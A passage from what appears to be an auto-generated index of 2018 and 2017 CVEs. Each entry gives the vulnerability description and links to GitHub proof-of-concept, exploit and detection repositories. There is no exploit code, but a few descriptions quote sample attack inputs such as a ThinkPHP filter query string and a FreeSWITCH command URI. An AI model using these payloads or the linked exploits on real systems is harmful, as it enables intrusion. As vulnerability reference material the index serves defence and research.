- [d4gh0s7/CVE-2018-19788](https://github.com/d4gh0s7/CVE-2018-19788)
- [Ekultek/PoC](https://github.com/Ekultek/PoC)
- [jhlongjr/CVE-2018-19788](https://github.com/jhlongjr/CVE-2018-19788)
### CVE-2018-19859 (2018-12-05)
OpenRefine before 3.2 beta allows directory traversal via a relative pathname in a ZIP archive.
- [WhiteOakSecurity/CVE-2018-19859](https://github.com/WhiteOakSecurity/CVE-2018-19859)
### CVE-2018-19911 (2018-12-06)
FreeSWITCH through 1.8.2, when mod_xml_rpc is enabled, allows remote attackers to execute arbitrary commands via the api/system or txtapi/system (or api/bg_system or txtapi/bg_system) query string on TCP port 8080, as demonstrated by an api/system?calc URI. This can also be exploited via CSRF. Alternatively, the default password of works for the freeswitch account can sometimes be used.
- [iSafeBlue/freeswitch_rce](https://github.com/iSafeBlue/freeswitch_rce)
### CVE-2018-19987 (2019-05-13)
D-Link DIR-822 Rev.B 202KRb06, DIR-822 Rev.C 3.10B06, DIR-860L Rev.B 2.03.B03, DIR-868L Rev.B 2.05B02, DIR-880L Rev.A 1.20B01_01_i3se_BETA, and DIR-890L Rev.A 1.21B02_BETA devices mishandle IsAccessPoint in /HNAP1/SetAccessPointMode. In the SetAccessPointMode.php source code, the IsAccessPoint parameter is saved in the ShellPath script file without any regex checking. After the script file is executed, the command injection occurs. A vulnerable /HNAP1/SetAccessPointMode XML message could have shell metacharacters in the IsAccessPoint element such as the `telnetd` string.
- [nahueldsanchez/blogpost_cve-2018-19987-analysis](https://github.com/nahueldsanchez/blogpost_cve-2018-19987-analysis)
### CVE-2018-20062 (2018-12-11)
An issue was discovered in NoneCms V1.3. thinkphp/library/think/App.php allows remote attackers to execute arbitrary PHP code via crafted use of the filter parameter, as demonstrated by the s=index/\think\Request/input&filter=phpinfo&data=1 query string.
- [NS-Sp4ce/thinkphp5.XRce](https://github.com/NS-Sp4ce/thinkphp5.XRce)
- [yilin1203/CVE-2018-20062](https://github.com/yilin1203/CVE-2018-20062)
### CVE-2018-20148 (2018-12-14)
In WordPress before 4.9.9 and 5.x before 5.0.1, contributors could conduct PHP object injection attacks via crafted metadata in a wp.getMediaItem XMLRPC call. This is caused by mishandling of serialized data at phar:// URLs in the wp_get_attachment_thumb_file function in wp-includes/post.php.
- [nth347/CVE-2018-20148_exploit](https://github.com/nth347/CVE-2018-20148_exploit)
### CVE-2018-20162 (2019-03-17)
Digi TransPort LR54 4.4.0.26 and possible earlier devices have Improper Input Validation that allows users with 'super' CLI access privileges to bypass a restricted shell and execute arbitrary commands as root.
- [stigtsp/CVE-2018-20162-digi-lr54-restricted-shell-escape](https://github.com/stigtsp/CVE-2018-20162-digi-lr54-restricted-shell-escape)
### CVE-2018-20165 (2019-03-22)
Cross-site scripting (XSS) vulnerability in OpenText Portal 7.4.4 allows remote attackers to inject arbitrary web script or HTML via the vgnextoid parameter to a menuitem URI.
- [hect0rS/Reflected-XSS-on-Opentext-Portal-v7.4.4](https://github.com/hect0rS/Reflected-XSS-on-Opentext-Portal-v7.4.4)
### CVE-2018-20250 (2019-02-05)
In WinRAR versions prior to and including 5.61, There is path traversal vulnerability when crafting the filename field of the ACE format (in UNACEV2.dll). When the filename field is manipulated with specific patterns, the destination (extraction) folder is ignored, thus treating the filename as an absolute path.
- [WyAtu/CVE-2018-20250](https://github.com/WyAtu/CVE-2018-20250)
- [QAX-A-Team/CVE-2018-20250](https://github.com/QAX-A-Team/CVE-2018-20250)
- [nmweizi/CVE-2018-20250-poc-winrar](https://github.com/nmweizi/CVE-2018-20250-poc-winrar)
- [blunden/UNACEV2.DLL-CVE-2018-20250](https://github.com/blunden/UNACEV2.DLL-CVE-2018-20250)
- [easis/CVE-2018-20250-WinRAR-ACE](https://github.com/easis/CVE-2018-20250-WinRAR-ACE)
- [STP5940/CVE-2018-20250](https://github.com/STP5940/CVE-2018-20250)
- [technicaldada/hack-winrar](https://github.com/technicaldada/hack-winrar)
- [Ektoplasma/ezwinrar](https://github.com/Ektoplasma/ezwinrar)
- [arkangel-dev/CVE-2018-20250-WINRAR-ACE-GUI](https://github.com/arkangel-dev/CVE-2018-20250-WINRAR-ACE-GUI)
- [AeolusTF/CVE-2018-20250](https://github.com/AeolusTF/CVE-2018-20250)
- [joydragon/Detect-CVE-2018-20250](https://github.com/joydragon/Detect-CVE-2018-20250)
- [likekabin/CVE-2018-20250](https://github.com/likekabin/CVE-2018-20250)
- [H4xl0r/WinRar_ACE_exploit_CVE-2018-20250](https://github.com/H4xl0r/WinRar_ACE_exploit_CVE-2018-20250)
- [eastmountyxz/CVE-2018-20250-WinRAR](https://github.com/eastmountyxz/CVE-2018-20250-WinRAR)
- [lxg5763/cve-2018-20250](https://github.com/lxg5763/cve-2018-20250)
- [zeronohacker/CVE-2018-20250](https://github.com/zeronohacker/CVE-2018-20250)
- [tzwlhack/CVE-2018-20250](https://github.com/tzwlhack/CVE-2018-20250)
- [tannlh/CVE-2018-20250](https://github.com/tannlh/CVE-2018-20250)
- [LamSonBinh/CVE-2018-20250](https://github.com/LamSonBinh/CVE-2018-20250)
### CVE-2018-20343 (2020-03-02)
Multiple buffer overflow vulnerabilities have been found in Ken Silverman Build Engine 1. An attacker could craft a special map file to execute arbitrary code when the map file is loaded.
- [Alexandre-Bartel/CVE-2018-20343](https://github.com/Alexandre-Bartel/CVE-2018-20343)
### CVE-2018-20377 (2018-12-23)
Orange Livebox 00.96.320S devices allow remote attackers to discover Wi-Fi credentials via /get_getnetworkconf.cgi on port 8080, leading to full control if the admin password equals the Wi-Fi password or has the default admin value. This is related to Firmware 01.11.2017-11:43:44, Boot v0.70.03, Modem 5.4.1.10.1.1A, Hardware 02, and Arcadyan ARV7519RW22-A-L T VR9 1.2.
- [zadewg/LIVEBOX-0DAY](https://github.com/zadewg/LIVEBOX-0DAY)
### CVE-2018-20433 (2018-12-24)
c3p0 0.9.5.2 allows XXE in extractXmlConfigFromInputStream in com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java during initialization.
- [shanika04/cp30_XXE_partial_fix](https://github.com/shanika04/cp30_XXE_partial_fix)
### CVE-2018-20434 (2019-04-24)
LibreNMS 1.46 allows remote attackers to execute arbitrary OS commands by using the $_POST['community'] parameter to html/pages/addhost.inc.php during creation of a new device, and then making a /ajax_output.php?id=capture&format=text&type=snmpwalk&hostname=localhost request that triggers html/includes/output/capture.inc.php command mishandling.
- [mhaskar/CVE-2018-20434](https://github.com/mhaskar/CVE-2018-20434)
### CVE-2018-20463 (2018-12-25)
An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. There is an arbitrary file read vulnerability via ../ directory traversal in query=php://filter/resource= in the jsmol.php query string. This can also be used for SSRF.
- [Henry4E36/CVE-2018-20463](https://github.com/Henry4E36/CVE-2018-20463)
### CVE-2018-20555 (2019-03-18)
The Design Chemical Social Network Tabs plugin 1.7.1 for WordPress allows remote attackers to discover Twitter access_token, access_token_secret, consumer_key, and consumer_secret values by reading the dcwp_twitter.php source code. This leads to Twitter account takeover.
- [fs0c131y/CVE-2018-20555](https://github.com/fs0c131y/CVE-2018-20555)
### CVE-2018-20580 (2019-05-03)
The WSDL import functionality in SmartBear ReadyAPI 2.5.0 and 2.6.0 allows remote attackers to execute arbitrary Java code via a crafted request parameter in a WSDL file.
- [gscamelo/CVE-2018-20580](https://github.com/gscamelo/CVE-2018-20580)
### CVE-2018-20718 (2019-01-15)
In Pydio before 8.2.2, an attack is possible via PHP Object Injection because a user is allowed to use the $phpserial$a:0:{} syntax to store a preference. An attacker either needs a "public link" of a file, or access to any unprivileged user account for creation of such a link.
- [us3r777/CVE-2018-20718](https://github.com/us3r777/CVE-2018-20718)
### CVE-2018-20966 (2019-08-12)
The woocommerce-jetpack plugin before 3.8.0 for WordPress has XSS in the Products Per Page feature.
- [parzel/CVE-2018-20966](https://github.com/parzel/CVE-2018-20966)
### CVE-2018-25031 (2022-03-11)
Swagger UI 4.1.2 and earlier could allow a remote attacker to conduct spoofing attacks. By persuading a victim to open a crafted URL, an attacker could exploit this vulnerability to display remote OpenAPI definitions. Note: This was originally claimed to be resolved in 4.1.3. However, third parties have indicated this is not resolved in 4.1.3 and even occurs in that version and possibly others.
- [afine-com/CVE-2018-25031](https://github.com/afine-com/CVE-2018-25031)
- [kriso4os/CVE-2018-25031](https://github.com/kriso4os/CVE-2018-25031)
- [rafaelcintralopes/SwaggerUI-CVE-2018-25031](https://github.com/rafaelcintralopes/SwaggerUI-CVE-2018-25031)
- [mathis2001/CVE-2018-25031](https://github.com/mathis2001/CVE-2018-25031)
- [wrkk112/CVE-2018-25031](https://github.com/wrkk112/CVE-2018-25031)
- [LUCASRENAA/CVE-2018-25031](https://github.com/LUCASRENAA/CVE-2018-25031)
- [hev0x/CVE-2018-25031-PoC](https://github.com/hev0x/CVE-2018-25031-PoC)
- [johnlaurance/CVE-2018-25031-test2](https://github.com/johnlaurance/CVE-2018-25031-test2)
- [geozin/POC-CVE-2018-25031](https://github.com/geozin/POC-CVE-2018-25031)
- [h2oa/CVE-2018-25031](https://github.com/h2oa/CVE-2018-25031)
- [natpakun/SSRF-CVE-2018-25031-](https://github.com/natpakun/SSRF-CVE-2018-25031-)
### CVE-2018-25032 (2022-03-25)
zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches.
- [Trinadh465/external_zlib_4.4_CVE-2018-25032](https://github.com/Trinadh465/external_zlib_4.4_CVE-2018-25032)
- [Satheesh575555/external_zlib-1.2.7_CVE-2018-25032](https://github.com/Satheesh575555/external_zlib-1.2.7_CVE-2018-25032)
- [Trinadh465/external_zlib_AOSP10_r33_CVE-2018-25032](https://github.com/Trinadh465/external_zlib_AOSP10_r33_CVE-2018-25032)
### CVE-2018-25075 (2023-01-15)
Es wurde eine kritische Schwachstelle in karsany OBridge bis 1.3 entdeckt. Hiervon betroffen ist die Funktion getAllStandaloneProcedureAndFunction der Datei obridge-main/src/main/java/org/obridge/dao/ProcedureDao.java. Durch Manipulation mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Die Komplexität eines Angriffs ist eher hoch. Sie gilt als schwierig auszunutzen. Ein Aktualisieren auf die Version 1.4 vermag dieses Problem zu lösen. Der Patch wird als 52eca4ad05f3c292aed3178b2f58977686ffa376 bezeichnet. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen.
- [epicosy/obridge](https://github.com/epicosy/obridge)
### CVE-2018-1000001 (2018-01-31)
In glibc 2.26 and earlier there is confusion in the usage of getcwd() by realpath() which can be used to write before the destination buffer leading to a buffer underflow and potential code execution.
- [0x00-0x00/CVE-2018-1000001](https://github.com/0x00-0x00/CVE-2018-1000001)
- [usernameid0/tools-for-CVE-2018-1000001](https://github.com/usernameid0/tools-for-CVE-2018-1000001)
### CVE-2018-1000006 (2018-01-24)
GitHub Electron versions 1.8.2-beta.3 and earlier, 1.7.10 and earlier, 1.6.15 and earlier has a vulnerability in the protocol handler, specifically Electron apps running on Windows 10, 7 or 2008 that register custom protocol handlers can be tricked in arbitrary command execution if the user clicks on a specially crafted URL. This has been fixed in versions 1.8.2-beta.4, 1.7.11, and 1.6.16.
- [CHYbeta/CVE-2018-1000006-DEMO](https://github.com/CHYbeta/CVE-2018-1000006-DEMO)
### CVE-2018-1000030 (2018-02-08)
Python 2.7.14 is vulnerable to a Heap-Buffer-Overflow as well as a Heap-Use-After-Free. Python versions prior to 2.7.14 may also be vulnerable and it appears that Python 2.7.17 and prior may also be vulnerable however this has not been confirmed. The vulnerability lies when multiply threads are handling large amounts of data. In both cases there is essentially a race condition that occurs. For the Heap-Buffer-Overflow, Thread 2 is creating the size for a buffer, but Thread1 is already writing to the buffer without knowing how much to write. So when a large amount of data is being processed, it is very easy to cause memory corruption using a Heap-Buffer-Overflow. As for the Use-After-Free, Thread3->Malloc->Thread1->Free's->Thread2-Re-uses-Free'd Memory. The PSRT has stated that this is not a security vulnerability due to the fact that the attacker must be able to run code, however in some situations, such as function as a service, this vulnerability can potentially be used by an attacker to violate a trust boundary, as such the DWF feels this issue deserves a CVE.
- [tylepr96/CVE-2018-1000030](https://github.com/tylepr96/CVE-2018-1000030)
### CVE-2018-1000082 (2018-03-13)
Ajenti version version 2 contains a Cross ite Request Forgery (CSRF) vulnerability in the command execution panel of the tool used to manage the server. that can result in Code execution on the server . This attack appear to be exploitable via Being a CSRF, victim interaction is needed, when the victim access the infected trigger of the CSRF any code that match the victim privledges on the server can be executed..
- [SECFORCE/CVE-2018-1000082-exploit](https://github.com/SECFORCE/CVE-2018-1000082-exploit)
### CVE-2018-1000117 (2018-03-07)
Python Software Foundation CPython version From 3.2 until 3.6.4 on Windows contains a Buffer Overflow vulnerability in os.symlink() function on Windows that can result in Arbitrary code execution, likely escalation of privilege. This attack appears to be exploitable via a python script that creates a symlink with an attacker controlled name or location. This vulnerability appears to have been fixed in 3.7.0 and 3.6.5.
- [u0pattern/CVE-2018-1000117-Exploit](https://github.com/u0pattern/CVE-2018-1000117-Exploit)
### CVE-2018-1000134 (2018-03-16)
UnboundID LDAP SDK version from commit 801111d8b5c732266a5dbd4b3bb0b6c7b94d7afb up to commit 8471904a02438c03965d21367890276bc25fa5a6, where the issue was reported and fixed contains an Incorrect Access Control vulnerability in process function in SimpleBindRequest class doesn't check for empty password when running in synchronous mode. commit with applied fix https://github.com/pingidentity/ldapsdk/commit/8471904a02438c03965d21367890276bc25fa5a6#diff-f6cb23b459be1ec17df1da33760087fd that can result in Ability to impersonate any valid user. This attack appear to be exploitable via Providing valid username and empty password against servers that do not do additional validation as per https://tools.ietf.org/html/rfc4513#section-5.1.1. This vulnerability appears to have been fixed in after commit 8471904a02438c03965d21367890276bc25fa5a6.
- [dragotime/cve-2018-1000134](https://github.com/dragotime/cve-2018-1000134)
### CVE-2018-1000140 (2018-03-23)
rsyslog librelp version 1.2.14 and earlier contains a Buffer Overflow vulnerability in the checking of x509 certificates from a peer that can result in Remote code execution. This attack appear to be exploitable a remote attacker that can connect to rsyslog and trigger a stack buffer overflow by sending a specially crafted x509 certificate.
- [s0/rsyslog-librelp-CVE-2018-1000140](https://github.com/s0/rsyslog-librelp-CVE-2018-1000140)
- [s0/rsyslog-librelp-CVE-2018-1000140-fixed](https://github.com/s0/rsyslog-librelp-CVE-2018-1000140-fixed)
### CVE-2018-1000199 (2018-05-24)
The Linux Kernel version 3.18 contains a dangerous feature vulnerability in modify_user_hw_breakpoint() that can result in crash and possibly memory corruption. This attack appear to be exploitable via local code execution and the ability to use ptrace. This vulnerability appears to have been fixed in git commit f67b15037a7a50c57f72e69a6d59941ad90a0f0f.
- [dsfau/CVE-2018-1000199](https://github.com/dsfau/CVE-2018-1000199)
### CVE-2018-1000224 (2018-08-20)
Godot Engine version All versions prior to 2.1.5, all 3.0 versions prior to 3.0.6. contains a Signed/unsigned comparison, wrong buffer size chackes, integer overflow, missing padding initialization vulnerability in (De)Serialization functions (core/io/marshalls.cpp) that can result in DoS (packet of death), possible leak of uninitialized memory. This attack appear to be exploitable via A malformed packet is received over the network by a Godot application that uses built-in serialization (e.g. game server, or game client). Could be triggered by multiplayer opponent. This vulnerability appears to have been fixed in 2.1.5, 3.0.6, master branch after commit feaf03421dda0213382b51aff07bd5a96b29487b.
- [zann1x/ITS](https://github.com/zann1x/ITS)
### CVE-2018-1000529 (2018-06-26)
Grails Fields plugin version 2.2.7 contains a Cross Site Scripting (XSS) vulnerability in Using the display tag that can result in XSS . This vulnerability appears to have been fixed in 2.2.8.
- [martinfrancois/CVE-2018-1000529](https://github.com/martinfrancois/CVE-2018-1000529)
### CVE-2018-1000542 (2018-06-26)
netbeans-mmd-plugin version <= 1.4.3 contains a XML External Entity (XXE) vulnerability in MMD file import that can result in Possible information disclosure, server-side request forgery, or remote code execution. This attack appear to be exploitable via Specially crafted MMD file.
- [forse01/CVE-2018-1000542-NetBeans](https://github.com/forse01/CVE-2018-1000542-NetBeans)
### CVE-2018-1000802 (2018-09-18)
Python Software Foundation Python (CPython) version 2.7 contains a CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in shutil module (make_archive function) that can result in Denial of service, Information gain via injection of arbitrary files on the system or entire drive. This attack appear to be exploitable via Passage of unfiltered user input to the function. This vulnerability appears to have been fixed in after commit add531a1e55b0a739b0f42582f1c9747e5649ace.
- [tna0y/CVE-2018-1000802-PoC](https://github.com/tna0y/CVE-2018-1000802-PoC)
### CVE-2018-1000844 (2018-12-20)
Square Open Source Retrofit version Prior to commit 4a693c5aeeef2be6c7ecf80e7b5ec79f6ab59437 contains a XML External Entity (XXE) vulnerability in JAXB that can result in An attacker could use this to remotely read files from the file system or to perform SSRF.. This vulnerability appears to have been fixed in After commit 4a693c5aeeef2be6c7ecf80e7b5ec79f6ab59437.
- [epicosy/Retrofit-1](https://github.com/epicosy/Retrofit-1)
### CVE-2018-1000861 (2018-12-10)
A code execution vulnerability exists in the Stapler web framework used by Jenkins 2.153 and earlier, LTS 2.138.3 and earlier in stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way.
- [1NTheKut/CVE-2019-1003000_RCE-DETECTION](https://github.com/1NTheKut/CVE-2019-1003000_RCE-DETECTION)
- [smokeintheshell/CVE-2018-1000861](https://github.com/smokeintheshell/CVE-2018-1000861)
### CVE-2018-1002105 (2018-12-05)
In all Kubernetes versions prior to v1.10.11, v1.11.5, and v1.12.3, incorrect handling of error responses to proxied upgrade requests in the kube-apiserver allowed specially crafted requests to establish a connection through the Kubernetes API server to backend servers, then send arbitrary requests over the same connection directly to the backend, authenticated with the Kubernetes API server's TLS credentials used to establish the backend connection.
- [gravitational/cve-2018-1002105](https://github.com/gravitational/cve-2018-1002105)
- [evict/poc_CVE-2018-1002105](https://github.com/evict/poc_CVE-2018-1002105)
- [imlzw/Kubernetes-1.12.3-all-auto-install](https://github.com/imlzw/Kubernetes-1.12.3-all-auto-install)
- [bgeesaman/cve-2018-1002105](https://github.com/bgeesaman/cve-2018-1002105)
- [sh-ubh/CVE-2018-1002105](https://github.com/sh-ubh/CVE-2018-1002105)
### CVE-2018-1999002 (2018-07-23)
A arbitrary file read vulnerability exists in Jenkins 2.132 and earlier, 2.121.1 and earlier in the Stapler web framework's org/kohsuke/stapler/Stapler.java that allows attackers to send crafted HTTP requests returning the contents of any file on the Jenkins master file system that the Jenkins master has access to.
- [wetw0rk/Exploit-Development](https://github.com/wetw0rk/Exploit-Development)
- [slowmistio/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins](https://github.com/slowmistio/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins)
- [0x6b7966/CVE-2018-1999002](https://github.com/0x6b7966/CVE-2018-1999002)
## 2017
### CVE-2017-0005 (2017-03-17)
The Graphics Device Interface (GDI) in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607 allows local users to gain privileges via a crafted application, aka "Windows GDI Elevation of Privilege Vulnerability." This vulnerability is different from those described in CVE-2017-0001, CVE-2017-0025, and CVE-2017-0047.
- [sheri31/0005poc](https://github.com/sheri31/0005poc)
### CVE-2017-0037 (2017-02-26)
Microsoft Internet Explorer 10 and 11 and Microsoft Edge have a type confusion issue in the Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement function in mshtml.dll, which allows remote attackers to execute arbitrary code via vectors involving a crafted Cascading Style Sheets (CSS) token sequence and crafted JavaScript code that operates on a TH element.
- [chattopadhyaykittu/CVE-2017-0037](https://github.com/chattopadhyaykittu/CVE-2017-0037)
### CVE-2017-0038 (2017-02-20)
gdi32.dll in Graphics Device Interface (GDI) in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold, 1511, and 1607 allows remote attackers to obtain sensitive information from process heap memory via a crafted EMF file, as demonstrated by an EMR_SETDIBITSTODEVICE record with modified Device Independent Bitmap (DIB) dimensions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-3216, CVE-2016-3219, and/or CVE-2016-3220.
- [k0keoyo/CVE-2017-0038-EXP-C-JS](https://github.com/k0keoyo/CVE-2017-0038-EXP-C-JS)
### CVE-2017-0055 (2017-03-17)
Microsoft Internet Information Server (IIS) in Windows Vista SP2; Windows Server 2008 SP2 and R2; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to perform cross-site scripting and run script with local user privileges via a crafted request, aka "Microsoft IIS Server XSS Elevation of Privilege Vulnerability."
- [NetJBS/CVE-2017-0055-PoC](https://github.com/NetJBS/CVE-2017-0055-PoC)
### CVE-2017-0065 (2017-03-17)
Microsoft Edge allows remote attackers to obtain sensitive information from process memory via a crafted web site, aka "Microsoft Browser Information Disclosure Vulnerability." This vulnerability is different from those described in CVE-2017-0009, CVE-2017-0011, CVE-2017-0017, and CVE-2017-0068.
- [Dankirk/cve-2017-0065](https://github.com/Dankirk/cve-2017-0065)
### CVE-2017-0075 (2017-03-17)
Hyper-V in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows guest OS users to execute arbitrary code on the host OS via a crafted application, aka "Hyper-V Remote Code Execution Vulnerability." This vulnerability is different from that described in CVE-2017-0109.
- [4B5F5F4B/HyperV](https://github.com/4B5F5F4B/HyperV)
- [belyakovvitagmailt/4B5F5F4Bp](https://github.com/belyakovvitagmailt/4B5F5F4Bp)
- [MarkusCarelli1/4B5F5F4Bp](https://github.com/MarkusCarelli1/4B5F5F4Bp)
### CVE-2017-0089 (2017-03-17)
Uniscribe in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows remote attackers to execute arbitrary code via a crafted web site, aka "Uniscribe Remote Code Execution Vulnerability." This vulnerability is different from those described in CVE-2017-0072, CVE-2017-0083, CVE-2017-0084, CVE-2017-0086, CVE-2017-0087, CVE-2017-0088, and CVE-2017-0090.
- [rainhawk13/Added-Pentest-Ground-to-vulnerable-websites-for-training](https://github.com/rainhawk13/Added-Pentest-Ground-to-vulnerable-websites-for-training)
### CVE-2017-0100 (2017-03-17)
A DCOM object in Helppane.exe in Microsoft Windows 7 SP1; Windows Server 2008 R2; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows local users to gain privileges via a crafted application, aka "Windows HelpPane Elevation of Privilege Vulnerability."
- [cssxn/CVE-2017-0100](https://github.com/cssxn/CVE-2017-0100)
### CVE-2017-0106 (2017-04-12)
Microsoft Excel 2007 SP3, Microsoft Outlook 2010 SP2, Microsoft Outlook 2013 SP1, and Microsoft Outlook 2016 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted document, aka "Microsoft Office Memory Corruption Vulnerability."
- [ryhanson/CVE-2017-0106](https://github.com/ryhanson/CVE-2017-0106)
### CVE-2017-0108 (2017-03-17)
The Windows Graphics Component in Microsoft Office 2007 SP3; 2010 SP2; and Word Viewer; Skype for Business 2016; Lync 2013 SP1; Lync 2010; Live Meeting 2007; Silverlight 5; Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; and Windows 7 SP1 allows remote attackers to execute arbitrary code via a crafted web site, aka "Graphics Component Remote Code Execution Vulnerability." This vulnerability is different from that described in CVE-2017-0014.
- [homjxi0e/CVE-2017-0108](https://github.com/homjxi0e/CVE-2017-0108)
### CVE-2017-0143 (2017-03-17)
The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability." This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.
- [valarauco/wannafind](https://github.com/valarauco/wannafind)
- [NatteeSetobol/Etern-blue-Windows-7-Checker](https://github.com/NatteeSetobol/Etern-blue-Windows-7-Checker)
- [h3xcr4ck3r/MS17-010_CVE-2017-0143](https://github.com/h3xcr4ck3r/MS17-010_CVE-2017-0143)
- [SampatDhakal/Metasploit-Attack-Report](https://github.com/SampatDhakal/Metasploit-Attack-Report)
### CVE-2017-0144 (2017-03-17)
The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability." This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.
- [peterpt/eternal_scanner](https://github.com/peterpt/eternal_scanner)
- [kimocoder/eternalblue](https://github.com/kimocoder/eternalblue)
- [EEsshq/CVE-2017-0144---EtneralBlue-MS17-010-Remote-Code-Execution](https://github.com/EEsshq/CVE-2017-0144---EtneralBlue-MS17-010-Remote-Code-Execution)
- [quynhold/Detect-CVE-2017-0144-attack](https://github.com/quynhold/Detect-CVE-2017-0144-attack)
- [ducanh2oo3/Vulnerability-Research-CVE-2017-0144](https://github.com/ducanh2oo3/Vulnerability-Research-CVE-2017-0144)
- [AnugiArrawwala/CVE-Research](https://github.com/AnugiArrawwala/CVE-Research)
- [DenuwanJayasekara/CVE-Exploitation-Reports](https://github.com/DenuwanJayasekara/CVE-Exploitation-Reports)
### CVE-2017-0145 (2017-03-17)
The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability." This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0146, and CVE-2017-0148.
- [MelonSmasher/chef_tissues](https://github.com/MelonSmasher/chef_tissues)
### CVE-2017-0147 (2017-03-17)
The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to obtain sensitive information from process memory via a crafted packets, aka "Windows SMB Information Disclosure Vulnerability."
- [RobertoLeonFR-ES/Exploit-Win32.CVE-2017-0147.A](https://github.com/RobertoLeonFR-ES/Exploit-Win32.CVE-2017-0147.A)
### CVE-2017-0148 (2017-03-17)
The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability." This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0146.
- [HakaKali/CVE-2017-0148](https://github.com/HakaKali/CVE-2017-0148)
### CVE-2017-0199 (2017-04-12)
Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, Windows 8.1 allow remote attackers to execute arbitrary code via a crafted document, aka "Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows API."
- [ryhanson/CVE-2017-0199](https://github.com/ryhanson/CVE-2017-0199)
- [SyFi/cve-2017-0199](https://github.com/SyFi/cve-2017-0199)
- [bhdresh/CVE-2017-0199](https://github.com/bhdresh/CVE-2017-0199)
- [NotAwful/CVE-2017-0199-Fix](https://github.com/NotAwful/CVE-2017-0199-Fix)
- [haibara3839/CVE-2017-0199-master](https://github.com/haibara3839/CVE-2017-0199-master)
- [Exploit-install/CVE-2017-0199](https://github.com/Exploit-install/CVE-2017-0199)
- [mzakyz666/PoC-CVE-2017-0199](https://github.com/mzakyz666/PoC-CVE-2017-0199)
- [n1shant-sinha/CVE-2017-0199](https://github.com/n1shant-sinha/CVE-2017-0199)
- [kn0wm4d/htattack](https://github.com/kn0wm4d/htattack)
- [joke998/Cve-2017-0199](https://github.com/joke998/Cve-2017-0199)
- [joke998/Cve-2017-0199-](https://github.com/joke998/Cve-2017-0199-)
- [sUbc0ol/Microsoft-Word-CVE-2017-0199-](https://github.com/sUbc0ol/Microsoft-Word-CVE-2017-0199-)
- [viethdgit/CVE-2017-0199](https://github.com/viethdgit/CVE-2017-0199)
- [nicpenning/RTF-Cleaner](https://github.com/nicpenning/RTF-Cleaner)
- [herbiezimmerman/2017-11-17-Maldoc-Using-CVE-2017-0199](https://github.com/herbiezimmerman/2017-11-17-Maldoc-Using-CVE-2017-0199)
- [jacobsoo/RTF-Cleaner](https://github.com/jacobsoo/RTF-Cleaner)
- [likekabin/CVE-2017-0199](https://github.com/likekabin/CVE-2017-0199)
- [stealth-ronin/CVE-2017-0199-PY-KIT](https://github.com/stealth-ronin/CVE-2017-0199-PY-KIT)
- [Phantomlancer123/CVE-2017-0199](https://github.com/Phantomlancer123/CVE-2017-0199)
